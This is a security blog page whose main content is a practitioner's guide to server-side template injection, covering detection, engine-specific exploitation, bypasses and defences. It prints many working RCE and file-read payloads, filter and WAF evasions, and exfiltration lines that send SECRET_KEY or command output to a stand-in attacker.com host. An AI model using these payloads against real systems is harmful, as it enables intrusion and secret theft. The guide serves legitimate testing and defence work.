JWE (pac4j-jwt pattern) 8. Session Management Session Security Requirements Property Implementation Attack Prevention Uniqueness Cryptographically random IDs Session prediction Unpredictability High entropy (128+ bits) Brute force guessing Secure Transmission HTTPS only, Secure flag Network interception Proper Expiration Absolute/idle timeouts Session hijacking Device Binding Tie session to device context/posture Portable cookie theft via AiTM Session Attack Vectors SESSION ATTACKS: β”œβ”€β”€ Session Hijacking β”‚ β”œβ”€β”€ Network sniffing β”‚ β”œβ”€β”€ Cross-site scripting (XSS) β”‚ β”œβ”€β”€ Malware/browser compromise β”‚ └── AiTM reverse proxy cookie interception (Evilginx, Tycoon 2FA) β”œβ”€β”€ Session Fixation β”‚ β”œβ”€β”€ Pre-authentication session reuse β”‚ β”œβ”€β”€ URL-based session ID β”‚ └── Missing session regeneration β”œβ”€β”€ Session Timing β”‚ β”œβ”€β”€ Concurrent sessions β”‚ β”œβ”€β”€ Logout handling β”‚ └── Session timeout bypass └── Session Token Portability β”œβ”€β”€ Stolen session cookies replayed from different device/IP β”œβ”€β”€ Impossible travel detection evasion └── Post-compromise MFA device registration for persistence 9. Authentication Bypasses & Attacks Business Logic Bypasses Bypass Type Technique Testing Approach Direct Access URL manipulation Forced browsing, parameter tampering State Manipulation Session/workflow bypass Multi-step process analysis Role Confusion Privilege escalation Horizontal/vertical privesc testing Reset Abuse Account takeover Password reset flow analysis Middleware-Only Auth Next.js CVE-2025-29927 β€” x-middleware-subrequest header bypass Verify auth in page routes/API routes, not just middleware Critical Authentication CVEs (2026) Recent authentication vulnerabilities demonstrate evolving attack patterns across enterprise systems and cloud services: ...

April 10, 2026 · 19 min · Carl Sampson

Comprehensive JWT Security Guide

Comprehensive JWT Security Guide 🆕 Enhanced May 2, 2026 - Updated with 138 sources and JWT security analysis including algorithm confusion attacks, signature bypasses, and modern token exploitation techniques. A practitioner’s reference for JSON Web Token security – vulnerabilities, exploitation techniques, attack vectors, implementation flaws, and defense strategies. Covers algorithm confusion, signature bypass, header injection, key confusion, library-specific issues, cryptographic attacks, attack chaining, and secure implementation patterns. Compiled from 138 research sources including latest library vulnerabilities. ...

April 10, 2026 · 16 min · Carl Sampson

Comprehensive SSTI Guide

Comprehensive SSTI Guide πŸ†• Enhanced May 2, 2026 - Updated with 88 sources and template injection CVEs including engine-specific exploits, AI/ML platform vulnerabilities, and RCE payload development techniques. A practitioner’s reference for Server-Side Template Injection β€” template engine vulnerabilities, exploitation techniques, payload development, framework-specific attacks, and defense strategies. Covers detection methodologies, engine-specific exploitation, and secure templating practices. Compiled from 88 research sources including latest AI/ML platform vulnerabilities. Table of Contents Fundamentals Detection & Identification Template Engine Exploitation Framework-Specific Attacks Payload Development Advanced Exploitation Bypass Techniques Testing Methodology Secure Implementation Detection & Prevention CVE Reference 1. Fundamentals SSTI Attack Surface Template Context Risk Level Common Locations User Input Rendering Critical Email templates, reports, dynamic pages Configuration Files High Template-based configs, dynamic routing Error Messages Medium Custom error pages, debug output Log Messages Low Log formatting, audit trails Email Workflow Templates Critical Notification templates, marketing emails (Shopify Return Magic, Fides) Recipe/CMS Content Fields Critical User-editable content rendered by template engines (Tandoor Recipes, Alfresco) JMS/Message Headers High Apache Camel template override headers (CamelFreemarkerTemplate, CamelVelocityTemplate) Template Engine Landscape Engine Language Popularity Exploitation Difficulty Jinja2 Python Very High Medium Twig PHP High Medium FreeMarker Java High High Velocity Java Medium High Thymeleaf Java Medium Medium Smarty PHP Medium Low Mako Python Low Low Handlebars Node.js Very High Medium Pug (Jade) Node.js High Medium Go html/template Go Medium High (context-dependent) Go text/template Go Medium Medium Jelly Java Medium (ServiceNow) Medium MVEL Java Low Low Mustache Multi-language Medium High (logicless 
by design) Tornado Python Medium Medium 2. Detection & Identification Detection Methodology SSTI DETECTION FLOW: 1. Identify template injection points 2. Test mathematical expressions 3. Analyze error messages 4. Determine template engine 5. Craft engine-specific payloads 6. Test blind detection via time-based or OOB channels Basic Detection Payloads Test Case Payload Expected Result Mathematical ${7*7} 49 if vulnerable Mathematical {​{7*7}} 49 if vulnerable Mathematical <%=7*7%> 49 if vulnerable String Concatenation ${'a'+'b'} ab if vulnerable Function Call ${T(java.lang.System).getProperty('user.name')} Username if Spring EL Go Detection {​{ . }} Memory address of passed object if Go template Handlebars Detection {​{this}} [object Object] if Handlebars FreeMarker String ${"Hello " + "World"} Hello World if FreeMarker FreeMarker Array ${["one", "two", "three"][1]} two if FreeMarker FreeMarker Length ${"test"?length} 4 if FreeMarker FreeMarker Date ${.now?string("yyyy-MM-dd")} Current date if FreeMarker Jelly (ServiceNow) <g:evaluate>gs.addErrorMessage(668.5*2);</g:evaluate> 1337 in error message Thymeleaf Inline [[${7*7}]] 49 if Thymeleaf expression inlining Template Engine Fingerprinting IDENTIFICATION DECISION TREE: β”œβ”€β”€ {​{7*7}} = 49 β”‚ β”œβ”€β”€ {​{this}} = [object Object] β†’ Handlebars (Node.js) β”‚ β”œβ”€β”€ Jinja2 (Python) β”‚ β”œβ”€β”€ Twig (PHP) β”‚ └── Nunjucks (Node.js) β”œβ”€β”€ ${7*7} = 49 β”‚ β”œβ”€β”€ ${"test"?length} = 4 β†’ FreeMarker (Java) β”‚ β”œβ”€β”€ ${T(java.lang.Runtime)} works β†’ Spring EL (Java) β”‚ └── Velocity (Java) β”œβ”€β”€ <%=7*7%> = 49 β”‚ β”œβ”€β”€ ERB (Ruby) β”‚ └── ASP Classic β”œβ”€β”€ {7*7} = 49 β”‚ └── Smarty (PHP) β”œβ”€β”€ {​{ . 
}} = memory address β”‚ └── Go html/template or text/template β”œβ”€β”€ [[${7*7}]] = 49 β”‚ └── Thymeleaf (Java) expression inlining └── <g:evaluate>...</g:evaluate> executes └── Jelly (ServiceNow) Blind SSTI Detection Method Payload Example Verification Time-based (Jinja2) {​{''.__class__.__mro__[1].__subclasses__()[59].__init__.__globals__['os'].popen('sleep 10').read()}} Response delay Time-based (FreeMarker) <#assign ex="freemarker.template.utility.Execute"?new()>${ex("sleep 10")} Response delay DNS Exfiltration {​{''.__class__.__mro__[1].__subclasses__()[59].__init__.__globals__['os'].popen('nslookup x.attacker.com').read()}} DNS logs HTTP Callback Jinja2 urllib.request.urlopen to attacker URL HTTP logs 3. Template Engine Exploitation Jinja2 (Python) Exploitation Attack Vector Payload Impact Basic RCE {​{config.__class__.__init__.__globals__['os'].popen('id').read()}} Command execution Subprocess {​{''.__class__.__mro__[1].__subclasses__()[104].__init__.__globals__['sys'].modules['subprocess'].check_output('whoami',shell=True)}} Command execution File Read {​{''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read()}} File access Config Access {​{config.SECRET_KEY}} Sensitive data exposure Lipsum Shorthand {​{lipsum.__globals__}} Bypass length limits Cycler RCE {​{cycler.__init__.__globals__.os.popen('id').read()}} Shorter RCE payload Hex-encoded attr() {​{()|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5fbase\x5f\x5f')|attr('\x5f\x5fsubclasses\x5f\x5f')()|attr('\x5f\x5fgetitem\x5f\x5f')(418)('id',shell=True,stdout=-1)|attr('communicate')()|attr('\x5f\x5fgetitem\x5f\x5f')(0)|attr('decode')('utf-8')}} Filter bypass RCE (CVE-2025-23211) Warning class import {​% for s in ().__class__.__base__.__subclasses__() %}{​% if "warning" in s.__name__ %}{​{s()._module.__builtins__['__import__']('os').popen("env").read()}}{​% endif %}{​% endfor %} RCE via warning subclass (Fides advisory) Twig (PHP) Exploitation TWIG ATTACK PATTERNS: β”œβ”€β”€ Filter Abuse β”‚ 
β”œβ”€β”€ {​{_self.env.registerUndefinedFilterCallback("exec")}} β”‚ β”œβ”€β”€ {​{_self.env.getFilter("id")}} β”‚ └── {​{["id"]|filter("system")}} β”œβ”€β”€ Function Injection β”‚ β”œβ”€β”€ {​{_self.env.registerUndefinedFunction("exec")}} β”‚ └── {​{_self.env.getFunction("system")}} β”œβ”€β”€ Object Injection β”‚ β”œβ”€β”€ {​{app.request.query.get('cmd')|passthru}} β”‚ └── {​{dump(app)}} (information disclosure) └── Escape Handler Abuse (Grav CMS β€” GHSA-2m7x-c7px-hp58) β”œβ”€β”€ {​{ grav.twig.twig.extensions.core.setEscaper('system','twig_array_filter') }} └── {​{ ['id'] | escape('system', 'system') }} (Redefine escape function via setEscaper to system(), bypasses sandbox when not enabled) FreeMarker (Java) Exploitation Technique Payload Description Object Creation <#assign ex="freemarker.template.utility.Execute"?new()> ${ex("id")} Command execution Static Method Call ${"freemarker.template.utility.ObjectConstructor"?new()("java.lang.ProcessBuilder","id").start()} Process creation File System Access <#assign fos=freemarker.template.utility.ObjectConstructor("java.io.FileOutputStream","/tmp/test")> File manipulation ?lower_abc Filter Bypass ${(6?lower_abc+18?lower_abc+...)?new()(9?lower_abc+4?lower_abc)} Reconstruct β€œfreemarker.template.utility.Execute” char-by-char to bypass keyword blocklists CamelContext Sandbox Escape <#assign cr=camelContext.getClassResolver()><#assign i=camelContext.getInjector()><#assign se=i.newInstance(cr.resolveClass('javax.script.ScriptEngineManager'))>${se.getEngineByName("js").eval("...")} RCE even with ClassResolver sandbox enabled (Apache Camel) CamelContext Language $camelContext.resolveLanguage("groovy").createExpression(<PAYLOAD>).evaluate(exchange, Object.class) Groovy expression via Camel context Alfresco Sandbox Bypass Exploit exposed objects in FreeMarker templates to bypass restrictions (CVE-2023-49964, incomplete fix for CVE-2020-12873) RCE in Alfresco CMS Handlebars (Node.js) Exploitation Technique Payload Description 
Prototype Pollution + AST Injection Pollute Object.prototype.type = 'Program' and Object.prototype.body with crafted AST containing RCE in NumberLiteral value Bypass parser validation, inject code directly into compiler Constructor Chain `{​{#with β€œs” as string toString Override + bind() Override Object.prototype.toString via defineProperty, use bind() to create function returning attacker payload, then invoke via Function constructor Full RCE without scope-defined functions (Shopify Return Magic) pendingContent Detection Pollute Object.prototype.pendingContent with test string Detect Handlebars engine in black-box with prototype pollution Pug (Node.js) Exploitation Technique Payload Description AST Injection via block Pollute Object.prototype.block = {"type":"Text","val":"<script>alert(origin)</script>"} XSS/content injection via prototype pollution Code Injection via line Pollute Object.prototype.block.type = "Code" with body containing RCE payload Command execution via AST manipulation Thymeleaf (Java) Exploitation THYMELEAF ATTACK PATTERNS: β”œβ”€β”€ Expression Preprocessing Double-Eval β”‚ β”œβ”€β”€ __${path}__ preprocesses user input, result evaluated as expression β”‚ β”œβ”€β”€ URL path injection: http://target/(${T(java.lang.Runtime).getRuntime().exec('calc')}) β”‚ └── Works on Jetty (allows {} in path), blocked on Tomcat (URL-encodes {}) β”œβ”€β”€ Spring Boot 3.3.4 Denylist Bypass (modzero research) β”‚ β”œβ”€β”€ Thymeleaf blocks T() for static class access and org.springframework.util.ReflectionUtils β”‚ β”œβ”€β”€ Bypass via org.apache.commons.lang3.reflect.MethodUtils (not on denylist) β”‚ β”œβ”€β”€ "".class.forName("org.apache.commons.lang3.reflect.MethodUtils") β”‚ β”‚ .invokeMethod( β”‚ β”‚ "".class.forName("org.apache.commons.lang3.reflect.MethodUtils") β”‚ β”‚ .invokeStaticMethod("".class.forName("java.lang.Runtime"),"getRuntime"), β”‚ β”‚ "exec", "whoami") β”‚ └── Full payload reads command output via IOUtils + file write for non-blind RCE 
β”œβ”€β”€ CVE-2023-38286 (Spring Boot Admin) β”‚ β”œβ”€β”€ Bypass Thymeleaf blacklists via ReflectionUtils (older versions) β”‚ β”œβ”€β”€ th:with chaining: findMethod β†’ invokeMethod β†’ exec β”‚ └── Requires MailNotifier enabled + write access to env vars └── CVE-2022-46166 (Spring Boot Admin) └── RCE via variable coverage in notification templates Velocity (Java) Exploitation Technique Payload Description CamelContext RCE ${camelContext.class.forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("...")} RCE via JavaScript engine in Apache Camel Template Override Send CamelVelocityTemplate header to override default template Dynamic template injection via message headers Resource URI Override Send CamelVelocityResourceUri header pointing to file:///etc/passwd Arbitrary file disclosure MVEL (Java) Exploitation Technique Payload Description Direct RCE @{java.lang.Runtime.getRuntime().exec('id')} Direct runtime access ObjectFactory RCE @{com.sun.org.apache.xerces.internal.utils.ObjectFactory.newInstance("javax.script.ScriptEngineManager",null,false).getEngineByName('js').eval("...")} Via ScriptEngine Template Override Send CamelMvelTemplate header Apache Camel dynamic template Go Template Exploitation GO SSTI ATTACK PATTERNS: β”œβ”€β”€ Detection β”‚ └── {​{ . 
}} β€” prints memory address/object dump of passed struct β”œβ”€β”€ Data Leakage β”‚ β”œβ”€β”€ {​{ .Email }} / {​{ .Password }} β€” access struct fields β”‚ └── Leaks any exported field on the passed object β”œβ”€β”€ Method Invocation β”‚ β”œβ”€β”€ {​{ .MethodName "arg" }} β€” call exported methods on passed struct β”‚ └── Methods must be exported (capitalized) to be callable β”œβ”€β”€ Gin Framework Gadgets β”‚ └── {​{ .Writer.WriteString "<script>alert(1)</script>" }} β€” XSS via response writer β”œβ”€β”€ Echo Framework Gadgets β”‚ β”œβ”€β”€ {​{ .File "/etc/passwd" }} β€” arbitrary file read β”‚ β”œβ”€β”€ {​{ .Attachment "/etc/passwd" "passwd" }} β€” file read via attachment β”‚ β”œβ”€β”€ {​{ .Inline "/etc/passwd" "passwd" }} β€” file read inline β”‚ └── {​{ $x:=.Echo.Filesystem.Open "/etc/hostname" }} {​{ $x.Seek 1 0 }} {​{ .Stream 200 "text/plain" $x }} β€” file read with I/O control β”œβ”€β”€ Fiber Framework Gadgets β”‚ β”œβ”€β”€ {​{ .App.Shutdown }} β€” denial of service β”‚ └── {​{ .Response.SendFile "/etc/hostname" }} {​{ .Response.Body }} β€” file read via fasthttp.Response β”œβ”€β”€ Method Confusion (OnSecurity Research) β”‚ β”œβ”€β”€ If passed object type matches a method's receiver, call with custom params β”‚ β”œβ”€β”€ echo.Context.File("path") gadget for arbitrary file read β”‚ └── Gadget hunting: search imported modules for exported methods with dangerous behavior └── text/template vs html/template β”œβ”€β”€ text/template allows direct "call" for public functions β€” higher risk └── html/template restricts call β€” requires gadget chains Jelly (ServiceNow) Exploitation Technique Payload Description Template Injection Probe <g:evaluate>gs.addErrorMessage(668.5*2);</g:evaluate> Confirm injection via math result (1337) in error message DB Credential Theft Inject <g:evaluate> to read glide.db.properties via SecurelyAccess + getBufferedReader() Extract database connection strings Chained Exploitation CVE-2024-4879 (title injection) + CVE-2024-5217 
(mitigation bypass) + CVE-2024-5178 (file filter bypass) Full RCE chain on ServiceNow Style Tag Bypass Embed Jelly tags inside <style> element in jvar_page_title parameter Bypass basic input validation 4. Framework-Specific Attacks Spring Framework (Java) Context Payload Impact Spring EL ${T(java.lang.Runtime).getRuntime().exec('id')} RCE SpEL Injection #{T(java.lang.System).getProperty('user.name')} Information disclosure Request Context ${@requestMappingHandlerMapping.getApplicationContext().getEnvironment().getProperty('java.version')} Environment access Thymeleaf Double-Eval '+${7*7}+' in Referer header with __${Referer}__ preprocessing RCE via preprocessing (modzero) MethodUtils Bypass "".class.forName("org.apache.commons.lang3.reflect.MethodUtils").invokeStaticMethod(...) Bypass Thymeleaf denylist in Spring Boot 3.3.4+ WebAsyncManager Header Exfil Access #ctx.getVariable("...WebAsyncManager...") to read request headers and write response Non-blind RCE without outbound connections Django (Python) DJANGO TEMPLATE ATTACKS: β”œβ”€β”€ Debug Information β”‚ β”œβ”€β”€ {​{settings.SECRET_KEY}} β”‚ β”œβ”€β”€ {​{settings.DATABASES}} β”‚ └── {​{settings.DEBUG}} β”œβ”€β”€ Object Traversal β”‚ β”œβ”€β”€ {​{request.META}} β”‚ β”œβ”€β”€ {​{request.user}} β”‚ └── {​{request.session}} └── Filter Abuse β”œβ”€β”€ Custom filters with dangerous functions └── Template tag injection Laravel (PHP) Attack Type Payload Result Blade RCE @php(system('id')) @endphp Command execution Variable Access {​{$app->make('config')->get('database.default')}} Configuration disclosure Helper Function {​{app('Illuminate\Contracts\Console\Kernel')->call('route:list')}} Application introspection Apache Camel (Java) APACHE CAMEL SSTI (CVE-2020-11994): β”œβ”€β”€ Affected Components β”‚ β”œβ”€β”€ camel-freemarker (CamelFreemarkerTemplate header) β”‚ β”œβ”€β”€ camel-velocity (CamelVelocityTemplate header) β”‚ β”œβ”€β”€ camel-mvel (CamelMvelTemplate header) β”‚ └── camel-mustache (MustacheResourceUri header 
β€” file disclosure only) β”œβ”€β”€ Attack Pattern β”‚ β”œβ”€β”€ Override default template via message header injection β”‚ β”œβ”€β”€ Header source depends on consumer: JMS properties, HTTP headers, etc. β”‚ └── ResourceUri headers enable arbitrary file disclosure (file:///etc/passwd) β”œβ”€β”€ Sandbox Bypass β”‚ β”œβ”€β”€ camelContext object exposed in template context β”‚ β”œβ”€β”€ getInjector() + getClassResolver() β†’ instantiate arbitrary classes β”‚ └── resolveLanguage("groovy") β†’ evaluate arbitrary Groovy expressions └── Impact └── RCE + Arbitrary File Disclosure across all template components Grav CMS (PHP/Twig) Attack Type Payload Result setEscaper Abuse {​{ grav.twig.twig.extensions.core.setEscaper('system','twig_array_filter') }} then {​{ ['id'] | escape('system', 'system') }} RCE by redefining escape filter to system() Root Cause Twig sandbox not enabled; unrestricted access to extension classes via template context Arbitrary callable registration 5. Payload Development Payload Construction Strategy PAYLOAD DEVELOPMENT PROCESS: β”œβ”€β”€ Environment Discovery β”‚ β”œβ”€β”€ Available classes/modules β”‚ β”œβ”€β”€ Security restrictions β”‚ └── Execution context β”œβ”€β”€ Bypass Development β”‚ β”œβ”€β”€ Filter evasion β”‚ β”œβ”€β”€ Character restrictions β”‚ └── Length limitations β”œβ”€β”€ Payload Optimization β”‚ β”œβ”€β”€ Minimize detection β”‚ β”œβ”€β”€ Maximize impact β”‚ └── Ensure reliability └── Multi-Stage Delivery β”œβ”€β”€ Store payload in persistent objects (Jinja2 config object) β”œβ”€β”€ Retrieve and execute across separate requests └── Useful when injection point has size limits (email fields) Common Payload Patterns Goal Python/Jinja2 PHP/Twig Java/FreeMarker Node.js/Handlebars Go List Classes {​{''.__class__.__mro__[1].__subclasses__()}} {​{dump()}} <#list .data_model?keys as key>${key}</#list> {​{this}} {​{ . 
}} Execute Command {​{cycler.__init__.__globals__.os.popen('id').read()}} {​{_self.env.registerUndefinedFilterCallback("system")}} <#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")} Prototype pollution + AST injection N/A (gadget-dependent) Read File {​{get_flashed_messages.__globals__['current_app'].open_resource('../../../etc/passwd').read()}} {​{include('/etc/passwd')}} <#assign file=...ObjectConstructor("java.io.File","/etc/passwd")> N/A {​{ .File "/etc/passwd" }} (Echo) Size-Limited Payload Technique (Jinja2) MULTI-REQUEST PAYLOAD STAGING: 1. Store payload in config object via short injection: {​{config.update(a=request.args.get('a'))}} with URL parameter: ?a=<long RCE payload> 2. Verify storage: {​{config.a}} 3. Execute stored payload: {​{''.__class__.__mro__[1].__subclasses__()...__globals__['os'].popen(config.a).read()}} Use case: SSTI in email fields with RFC-imposed size limits 6. Advanced Exploitation Blind SSTI Exploitation Detection Method Payload Verification Time-based {​{''.__class__.__mro__[1].__subclasses__()[59].__init__.__globals__['time'].sleep(5)}} Response delay DNS Exfiltration {​{''.__class__.__mro__[1].__subclasses__()[59].__init__.__globals__['os'].popen('nslookup whoami.attacker.com').read()}} DNS logs HTTP Callback {​{''.__class__.__mro__[1].__subclasses__()[59].__init__.__globals__['urllib'].request.urlopen('http://attacker.com/'+config.SECRET_KEY)}} HTTP logs Sandbox Escape Techniques SANDBOX BYPASS METHODS: β”œβ”€β”€ Python/Jinja2 β”‚ β”œβ”€β”€ __builtins__ access via globals β”‚ β”œβ”€β”€ Class traversal to dangerous modules β”‚ β”œβ”€β”€ Import statement reconstruction β”‚ └── Warning subclass β†’ __builtins__['__import__'] chain β”œβ”€β”€ Java/FreeMarker β”‚ β”œβ”€β”€ ObjectConstructor for arbitrary class instantiation β”‚ β”œβ”€β”€ Static method calls via ?new() β”‚ β”œβ”€β”€ Reflection API abuse β”‚ β”œβ”€β”€ CamelContext.getInjector() + getClassResolver() (Apache Camel) β”‚ └── ScriptEngineManager for 
Groovy/JavaScript eval β”œβ”€β”€ Java/Thymeleaf β”‚ β”œβ”€β”€ Expression preprocessing (__...__) double-evaluation β”‚ β”œβ”€β”€ org.apache.commons.lang3.reflect.MethodUtils (bypass Spring Boot 3.3.4 denylist) β”‚ β”œβ”€β”€ "".class.forName() to load arbitrary classes β”‚ └── ReflectionUtils (older versions, now denylisted) β”œβ”€β”€ PHP/Twig β”‚ β”œβ”€β”€ Filter/function registration β”‚ β”œβ”€β”€ Object property access β”‚ β”œβ”€β”€ Include/eval function calls β”‚ └── setEscaper() to redefine escape function as system() (Grav CMS) └── Node.js/Handlebars β”œβ”€β”€ AST Injection via prototype pollution (bypass parser entirely) β”œβ”€β”€ Function constructor via this.constructor.constructor β”œβ”€β”€ Object.prototype.toString override + bind() for RCE └── Built-in helper abuse (with, blockHelperMissing) Prototype Pollution to SSTI (Node.js) PROTOTYPE POLLUTION β†’ SSTI CHAIN: β”œβ”€β”€ Handlebars β”‚ β”œβ”€β”€ Pollute Object.prototype.type = "Program" β”‚ β”œβ”€β”€ Pollute Object.prototype.body with AST containing RCE in NumberLiteral.value β”‚ β”œβ”€β”€ Template string bypasses parser (treated as pre-parsed AST) β”‚ └── Compiler executes injected code directly β”œβ”€β”€ Pug β”‚ β”œβ”€β”€ Pollute Object.prototype.block with {type:"Text", val:"<payload>"} β”‚ β”œβ”€β”€ When ast.type is "While", walkAST follows ast.block (uses prototype) β”‚ └── High reliability: any template referencing arguments triggers it └── Detection β”œβ”€β”€ Handlebars: Object.prototype.pendingContent = "<test>" β†’ appears in output └── Pug: Object.prototype.block = {type:"Text", val:"<test>"} β†’ appears in output 7. 
Bypass Techniques Filter Evasion Restriction Bypass Technique Example Keyword Blacklist String concatenation {​{'sy'+'stem'}} Character Filtering Unicode/Encoding {​{'\u0073\u0079\u0073\u0074\u0065\u006d'}} Length Limits Shortened payloads {​{lipsum.__globals__}} Quotes Blocked String methods {​{request.args.cmd|system}} Keyword Blacklist (FreeMarker) ?lower_abc encoding 6?lower_abc = β€œf”, reconstruct class names char-by-char Attribute Name Filtering Hex-encoded attr() |attr('\x5f\x5fclass\x5f\x5f') instead of .__class__ Size Limit Config object staging Store payload in config.a via one request, execute in another Thymeleaf Static Class Block commons-lang3 MethodUtils Use "".class.forName(...) to load non-denylisted reflection class ServiceNow Mitigation Style tag wrapper + Jelly xmlns Embed <g:evaluate> inside <style> tags WAF Bypass Strategies WAF EVASION TECHNIQUES: β”œβ”€β”€ Encoding Variations β”‚ β”œβ”€β”€ URL encoding (%7B%7B) β”‚ β”œβ”€β”€ Unicode encoding (\u007B\u007B) β”‚ └── HTML entity encoding (&lbrace;&lbrace;) β”œβ”€β”€ Structure Manipulation β”‚ β”œβ”€β”€ Whitespace insertion {​{ 7*7 }} β”‚ β”œβ”€β”€ Comment insertion {# comment #} β”‚ └── Nested expressions {​{7*{​{7}}}} β”œβ”€β”€ Payload Fragmentation β”‚ β”œβ”€β”€ Multi-step injection β”‚ β”œβ”€β”€ Context-dependent payloads β”‚ └── Request splitting β”œβ”€β”€ FreeMarker-Specific β”‚ β”œβ”€β”€ ?lower_abc / ?upper_abc character reconstruction β”‚ β”œβ”€β”€ 1.1?c[1] to generate dot character β”‚ └── Numeric built-in abuse to construct arbitrary strings └── Thymeleaf-Specific β”œβ”€β”€ Preprocessor double-evaluation via __${...}__ β”œβ”€β”€ @{} link expression parentheses to clear context └── Server-specific: Jetty allows {} in URL path, Tomcat blocks 8. 
Testing Methodology Manual Testing Workflow Phase Activities Tools/Techniques Discovery Input point identification Burp Suite, manual analysis Detection Template injection testing Mathematical expressions, error analysis Identification Template engine fingerprinting Specific syntax testing, decision tree Exploitation Payload development Engine documentation, trial and error Impact Assessment Privilege escalation, data access Full exploitation chains Blind Validation Time-based and OOB testing sleep commands, DNS/HTTP callbacks Automated Testing Tools SSTI TESTING ARSENAL: β”œβ”€β”€ Detection Tools β”‚ β”œβ”€β”€ tplmap (comprehensive scanner β€” epinna) β”‚ β”œβ”€β”€ SSTImap (exploitation framework β€” vladko312) β”‚ β”œβ”€β”€ Burp extensions (various) β”‚ └── Nuclei templates (e.g., CVE-2024-5217.yaml) β”œβ”€β”€ Payload Generators β”‚ β”œβ”€β”€ PayloadsAllTheThings (payload collection) β”‚ β”œβ”€β”€ SecLists (template payloads) β”‚ └── Custom scripts β”œβ”€β”€ Framework-Specific β”‚ β”œβ”€β”€ j2eeTester (Java templates) β”‚ β”œβ”€β”€ TwigSecurityChecker (Twig) β”‚ └── JinjaSecurityScanner (Jinja2) β”œβ”€β”€ Reconnaissance β”‚ β”œβ”€β”€ Shodan/Censys/FOFA (identify exposed instances, e.g., ServiceNow) β”‚ └── Nuclei for automated version/vulnerability probing └── CI/CD Integration β”œβ”€β”€ SAST rules: flag {​{{ in .hbs files (Handlebars triple braces) β”œβ”€β”€ Secrets scanners: detect credentials in templates └── Build guardrails: break on unsafe patterns 9. 
Secure Implementation

Secure Template Design Principles

| Principle | Implementation | Security Benefit |
|---|---|---|
| Input Validation | Strict allowlist validation | Prevents injection |
| Context Isolation | Separate template contexts | Limits impact |
| Minimal Privileges | Restricted template capabilities | Reduces attack surface |
| Output Encoding | Automatic encoding | Prevents XSS |
| Sandbox Enforcement | Enable template engine sandbox mode | Limits exploitation scope |
| Least Privilege Containers | Run containers as non-root | Limits post-exploitation impact (CVE-2025-23211) |

Framework-Specific Security

SECURE CONFIGURATION:
├── Jinja2/Django
│   ├── autoescape=True (XSS prevention)
│   ├── Restrict dangerous globals
│   ├── Custom filter validation
│   └── Use SandboxedEnvironment for user-controlled templates
├── Twig/Symfony
│   ├── Strict mode enabled
│   ├── Sandbox mode for user content (prevents setEscaper abuse)
│   ├── Function/filter allowlisting
│   └── Block access to internal extension objects
├── FreeMarker/Spring
│   ├── Restricted method calls
│   ├── Template loading restrictions
│   ├── API access controls
│   └── Use TemplateClassResolver.ALLOWS_NOTHING_RESOLVER
├── Thymeleaf/Spring Boot
│   ├── Avoid expression preprocessing (__...__) with user input
│   ├── Denylist covers java.*, javax.*, org.springframework.util.*
│   ├── Audit third-party libs (commons-lang3 MethodUtils still exploitable)
│   └── Prefer Tomcat over Jetty (Tomcat blocks {} in URL paths)
├── Handlebars/Node.js
│   ├── Always use double braces {{ }} (auto-escaping), never triple {{{ }}}
│   ├── Audit custom helpers — never use SafeString with user input
│   ├── Protect against prototype pollution (freeze Object.prototype, use Maps)
│   └── Keep dependencies updated (prototype pollution CVEs)
├── Go Templates
│   ├── Prefer html/template over text/template (restricts "call")
│   ├── Never pass entire framework context (gin.Context, echo.Context) to templates
│   ├── Create minimal view structs with only needed fields
│   └── Avoid exported methods with dangerous behavior on passed types
├── ServiceNow/Jelly
│   ├── Apply vendor patches promptly (CVE-2024-4879 exploited in wild)
│   ├── Sanitize jvar_page_title and similar parameters
│   └── Monitor for Jelly tag injection patterns in logs
└── General Practices
    ├── Pre-compile templates (never build from user strings)
    ├── Validate all inputs
    ├── Monitor template rendering
    └── Run applications as non-root in containers

10. Detection & Prevention

Runtime Protection

| Control | Implementation | Effectiveness |
|---|---|---|
| Input Sanitization | Remove template syntax | High (if comprehensive) |
| Template Sandboxing | Restricted execution environment | Medium (bypass possible) |
| Content Security Policy | Restrict dynamic content | Low (server-side attack) |
| Web Application Firewall | Pattern-based blocking | Medium (bypass common) |
| Prototype Pollution Prevention | Object.freeze, Map usage, input validation | High (prevents AST injection in Node.js) |

Monitoring & Detection

DETECTION STRATEGIES:
├── Log Analysis
│   ├── Template rendering errors
│   ├── Unusual template patterns ({{, ${, <#, <g:evaluate>)
│   ├── Performance anomalies
│   └── ServiceNow: monitor login.do for Jelly tag injection
├── Runtime Monitoring
│   ├── Template execution time (detect sleep-based blind SSTI)
│   ├── Memory consumption
│   ├── System call monitoring (exec, popen, ProcessBuilder)
│   └── DNS/HTTP outbound connections from template rendering
├── Security Scanning
│   ├── Regular SAST scans (CodeQL, Semgrep)
│   ├── DAST testing (tplmap, SSTImap, Nuclei)
│   ├── Dependency vulnerability checks (prototype pollution in Node.js)
│   └── Internet exposure scanning (Shodan, Censys, FOFA)
└── Supply Chain
    ├── Monitor npm advisories for Handlebars, Pug, flat
    ├── Track Java dependency updates (FreeMarker, Thymeleaf, commons-lang3)
    └── Automated SCA in CI/CD pipelines

Incident Response

| Phase | Actions | Considerations |
|---|---|---|
| Detection | Log analysis, alert investigation | False positive filtering |
| Containment | Template access restriction | Service availability |
| Eradication | Vulnerable template removal | Code deployment |
| Recovery | Secure template implementation | Testing requirements |
| Lessons Learned | Process improvement | Training needs |

11. CVE Reference

| CVE | Product | Engine | CVSS | Impact |
|---|---|---|---|---|
| CVE-2024-4879 | ServiceNow | Jelly | 9.3 | Unauthenticated RCE via title injection |
| CVE-2024-5217 | ServiceNow | Jelly | 9.2 | Template injection mitigation bypass |
| CVE-2024-5178 | ServiceNow | Jelly | 6.9 | Filesystem filter bypass, sensitive file read |
| CVE-2026-5760 | SGLang | Template Engine | 9.8 | RCE via malicious GGUF model files |
| CVE-2025-61620 | AI Model Platform | Jinja2 | 8.5 | Template injection in model configuration |
| CVE-2025-23211 | Tandoor Recipes | Jinja2 | 9.9 | Authenticated SSTI to root RCE in Docker |
| CVE-2023-38286 | Spring Boot Admin | Thymeleaf | – | RCE via Thymeleaf blacklist bypass |
| CVE-2022-46166 | Spring Boot Admin | Thymeleaf | – | RCE via variable coverage in notifiers |
| CVE-2023-49964 | Alfresco | FreeMarker | – | SSTI sandbox bypass (incomplete fix of CVE-2020-12873) |
| CVE-2020-12873 | Alfresco | FreeMarker | – | Original SSTI via exposed FreeMarker objects |
| CVE-2020-11994 | Apache Camel | FreeMarker/Velocity/MVEL/Mustache | – | RCE + file disclosure via template header override |
